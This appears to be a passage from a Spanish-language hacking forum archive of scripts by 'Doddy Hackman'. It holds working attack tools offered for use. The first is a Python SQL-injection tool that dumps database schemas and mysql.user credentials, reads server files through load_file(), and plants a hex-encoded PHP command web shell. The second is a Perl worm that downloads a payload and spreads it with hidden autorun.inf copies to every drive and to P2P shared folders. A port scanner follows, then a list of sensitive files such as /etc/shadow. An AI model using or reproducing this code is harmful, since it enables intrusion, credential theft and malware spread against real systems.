web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db2 = db table2 = table db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db2 = db db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla2 = tabla tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching columns\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found in table "+tabla2+"] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def men(): print "\n[+] Press any key to continue\n" raw_input() menu(page,bypass) def fuzz(web,bypassx): print "\n[+] Fuzzing files with load_file()\n" pass1,pass2 = bypass(bypassx) for archivos in files: nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") print "\n[+] Finished\n" def fuzzfile(web,bypassx): pass1,pass2 = bypass(bypassx) archivos = raw_input("\n[File To load] : ") nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") else: print "\n\n[-] Error" def into(web,passx): pass1,pass2 = bypass(passx) dira = raw_input("\n\n[Full Source Discloure] : ") diro = raw_input("\n[Directory to test] : ") linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = dira+"/cmd.php" lugardos = diro+"/cmd.php" webtest = "http://"+gethost(web)+lugardos web1 = re.sub("hackman",linea,web) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if (re.findall("Mini Shell By Doddy",code)): print "\n\n[shell up] : "+webtest savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest) else: print "\n\n[-] Error" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n" print "1 - Show tables" print "2 - Show columns of the a table" print "3 - Show databases" print "4 - Show tables from the a DB" print "5 - Show columns from the a table of the DB" print "\n[mysql.user]\n" print "6 - Show users" print "\n[Others]\n" print "7 - Show details" print "8 - Dump data" print "9 - Fuzz Files with load_file" print "10 - Load files with load_file" print "11 - Create Shell" print "12 - Show log" print "13 - Change target" print "14 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) men() elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) men() elif op == 3: showdbs(page,bypass) men() elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) men() elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) men() elif op == 6: mysqluser(page,bypass) men() elif op == 7: more(page,bypass) men() elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) men() elif op == 9: fuzz(page,bypass) men() elif op == 10: fuzzfile(page,bypass) men() elif op == 11: into(page,bypass) men() elif op == 12: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 13: sta() elif op == 14: sys.exit(1) else: menu(page,bypass) except: menu(page,bypass) def more(web,passx): pass1,pass2 = bypass(passx) otraweb = web print "\n[+] Searching more data\n" hextest = "0x2f6574632f706173737764" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) savefile("logs/"+gethost(web)+".txt","") print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") codetres = toma(web2) if (re.findall("ERTOR854",codetres)): print "[+] load_file() : on" savefile("logs/"+gethost(web)+".txt","[+] load_file() : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n") menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" reiniciar() def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2) if not code==codedos: print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" op = raw_input("\n[+] Scan anyway y/n : ") if op == "y": findlength(web,passx) elif op == "n": reiniciar() else: reiniciar() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") if (re.findall("hackman",web,re.I)): menu(web,bypasx) else: try: scan(web,bypasx) except: print "\n[-] Web offline" reiniciar() installer() sta() #The End

#330

Scripting / [Perl] WormDownloader 0.3

3 Diciembre 2011, 16:35 PM

Simple programa que nos sirve para bajar un virus cualquiera de una pagina para despues propagarlo por toda la computarora

Código (perl) [Seleccionar]


#!usr/bin/perl
#WormDownloader 0.3
#Coded By Doddy H

use Win32::File;
use Cwd;
use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

my @rutas = ("C:\\Archivos de programa\\KMD\\My Shared Folder","C:\\Archivos de programa\\Kazaa\\My Shared Folder\\","C:\\Archivos de programa\\KaZaA Lite\\My Shared Folder\\","C:\\Archivos de programa\\Morpheus\\My Shared Folder\\","C:\Archivos de programa\\Grokster\\My Grokster\\","C:\\Archivos de programa\\BearShare\\Shared\\","C:\\Archivos de programa\\Edonkey2000\\Incoming\\","C:\\Archivos de programa\\limewire\\Shared\\","C:\\Documents and Settings\\Administrador\\Configuración local\\Datos de programa\\Ares\\My Shared Folder\\");

head();
print "\n\n[+] File to download : ";
chomp(my $down = <stdin>);
print "\n[+] Name to save : ";
chomp(my $name= <stdin>);
print "\n[+] Downloading...\n";
if (download($down,$name)) {
hideit($name,"hide");
print "\n[+] Propagation routine starting\n";
wormear($down,$name);
} else {
print "\n[-] Error downloading\n";
}
print "\n\n[+] Finished\n\n";
copyright();
<stdin>;

sub wormear {

my($filedown,$name) = @_;

my $exe = getcwd()."/".$name;

open (AUTORUN,">>autorun.inf");
print AUTORUN "[AutoRun]\n";
print AUTORUN "open = $exe\n";
print AUTORUN "shellexecute=$exe\n";
print AUTORUN "shell\\Auto\\command=$exe\n";
close AUTORUN;

for my $dir(65..90) {
Win32::CopyFile($name,chr($dir).":/".$name,0);
Win32::CopyFile("autorun.inf",chr($dir).":/autorun.inf",0);
hideit(chr($dir).":/".$name,"hide");
hideit(chr($dir).":/autorun.inf","hide");
}
unlink("autorun.inf");

for my $r(@rutas) {
chomp $r;
if (-d $r) {
Win32::CopyFile($name,$r."/".$name,0);
}}}

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
#print "error\n";
}
}

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

sub head {
print "\n\n-- == WormDownloader == --\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

#The End ?

#331

Scripting / [Perl] USB Manager 0.2

3 Diciembre 2011, 16:34 PM

Simple manager para usb

Código (perl) [Seleccionar]


#!usr/bin/perl
#USB Manager 0.2
#Coded By Doddy H

use Cwd;

head();

print "\n\n[+] USB : ";
chomp(my $usb=<stdin>);
chdir($usb);
print "\n";
nave:
print "\n".getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/show (.*)/) {
my $fu = $1;
chomp $fu;
if (-f $fu or -d $fu) {
hideit($fu,"show");
print "\n\n[+] Attributes changed\n\n";
}
}
if ($rta=~/hide (.*)/) {
my $fua = $1;
chomp $fua;
if (-f $fua or -d $fua) {
hideit($fua,"hide");
print "\n\n[+] Attributes changed\n\n";
}
}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open hide show exit\n\n";
}
if ($rta=~/exit/) {
copyright();
exit(1);
}
print "\n\n";
goto nave;

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

sub hideit {
use Win32::File;
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "\n[-] error\n";
}
}

sub head {
print "\n\n-- == USB Manager == --\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

# The End ?

#332

Scripting / [Perl] SecurityManager 0.3

3 Diciembre 2011, 16:34 PM

Un simple programa para ver las ultimas 5 vulnerabilidades reportadas en securityfocus

Código (perl) [Seleccionar]


#!usr/bin/perl
#SecurityFocus Manager 0.3
#(C) Doddy Hackman 2011
##ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTML::Parser;
use HTML::Strip;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
refrescar();

sub refrescar {

clean();
head();

print "\n\n[+] List of vulnerabilities\n\n\n";

my %links = getlinks($code);
my $contador = -1;

for my $da(keys %links) {
$contador++;
print "[$contador] : $da\n";
}
print qq(

[1] : Refresh
[2] : Info
[3] : Discussion
[4] : Exploit
[5] : Solution
[6] : References
[7] : Exit
 
);

print "\n[Option] : ";
chomp(my $op = <stdin>);

if ($op eq 1) { 
clean();
refrescar(); 
}
elsif ($op eq 2) {

print "\n[+] Number : ";
chomp(my $se=<stdin>);

my $fin = (keys %links)[$se];
my $pro = (values %links)[$se];

dar($fin,$pro,"tres");

}
elsif($op eq 3) {

print "\n[+] Number : ";
chomp(my $se=<stdin>);

my $fin = (keys %links)[$se];
my $pro = (values %links)[$se];

dar($fin,$pro,"cuatro");

}
elsif($op eq 4) {

print "\n[+] Number : ";
chomp(my $se=<stdin>);

my $fin = (keys %links)[$se];
my $pro = (values %links)[$se];

dar($fin,$pro,"cinco");

} 
elsif ($op eq 5) {

print "\n[+] Number : ";
chomp(my $se=<stdin>);

my $fin = (keys %links)[$se];
my $pro = (values %links)[$se];

dar($fin,$pro,"seis");

}
elsif ($op eq 6) {

print "\n[+] Number : ";
chomp(my $se=<stdin>);

my $fin = (keys %links)[$se];
my $pro = (values %links)[$se];

dar($fin,$pro,"siete");

}
elsif ($op eq 7) {
copyright();
exit(1);
}
else {
refrescar(); 
}
}

sub dar {

my($title,$numero,$op) = @_;

print "\n\n[+] Getting data\n\n";

if ($op eq "tres") {
$link = "http://www.securityfocus.com/bid/$numero/info";
}
if ($op eq "cuatro") {
$link = "http://www.securityfocus.com/bid/$numero/discuss";
}
if ($op eq "cinco") {
$link = "http://www.securityfocus.com/bid/$numero/exploit";
}
if ($op eq "seis") {
$link = "http://www.securityfocus.com/bid/$numero/solution";
}
if ($op eq "siete") {
$link = "http://www.securityfocus.com/bid/$numero/references";
}

my $code = toma($link);

if ($code=~/<div id="vulnerability">(.*?)<\/div>/s){
my $code = $1;
chomp $code;
my $uno = HTML::Strip->new(emit_spaces =>1);
my $final = $uno->parse($code);
$final =~ s/^[\t\f ]+|[\t\f ]+$//mg;
$final =~s/$title/ /;
print $final;
}

print "\n\n[+] Press any key to continue\n\n";
<stdin>;
refrescar();

}

sub getlinks {

my $code = toma("http://www.securityfocus.com/");

my $test = HTML::Parser->new(
start_h => [\&start, "tagname,attr"],
text_h  => [\&text, "dtext"],
);
$test->parse($code);

sub start {
my($a,$b) = @_;
my %e = %$b;
unless($a ne "a") {
$d = $e{href};
$c = $a;
}}

sub text {
my $title = shift;
chomp $title;
unless($c ne "a") {
if ($d=~/\/bid\/(.*)/) {
my $id = $1;
unless($title=~/www.securityfocus.com/) {
$links{$title} = $id;
}}
$d = "";
}}
return %links;
}

sub toma {
return $nave->get($_[0])->content;
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub clean {
#if ($^O =~/Win32/ig) {
system("cls");
#} else {
#system("clear");
#}
}

sub head {
print "\n\n-- == SecurityFocus Manager 0.3 == --\n\n";
}

sub copyright {
print "\n\n\n(C) Doddy Hackman 2011\n\n";
}

#Credits: Thanks to explorer (perlenespanol)
# The End ?

#333

Scripting / [Perl] ScanPort 0.5

3 Diciembre 2011, 16:33 PM

Simple scanner port en perl

Código (perl) [Seleccionar]


#!usr/bin/perl
#ScanPort 0.5
#Examples 
#perl scan.pl -target localhost -option fast
#perl scan.pl -target localhost -option full -parameters 1-100 

use IO::Socket;
use Getopt::Long;

GetOptions(
"-target=s" => \$target, 
"-option=s" => \$opcion,
"-parameters=s"=>\$parameters
);

head();
unless($target) {
sintax();
} else {
if ($opcion eq "fast") {
scanuno($target);
}
if ($opcion eq "full" and $parameters) {
if($parameters=~/(.*)-(.*)/) {
my $start = $1;
my $end = $2;
scandos($target,$start,$end);
}
}
}

copyright();

sub scanuno {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);

print "\n[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Scan Finish\n";
}


sub scandos {

print "\n[+] Scanning $_[0]\n\n\n";

for my $port($_[1]..$_[2]) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : $port\n";
}
}
print "\n\n[+] Scan Finish\n";
}

sub head {
print "-- == ScanPort 0.5 == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

sub sintax {
print "\n[+] sintax : $0 -target target -option fast/full -parameters 1-9999\n";
}


# The End ?

#334

Scripting / [Perl] Project Stalker 0.5

3 Diciembre 2011, 16:33 PM

Lo mismo que la version anterior solo se le mejoro el cliente para vulnerabilidades SQLi

Código (perl) [Seleccionar]


#!usr/bin/perl
#Project STALKER 0.5 
#Coded By Doddy H
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#

use IO::Socket;	
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init


my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\ph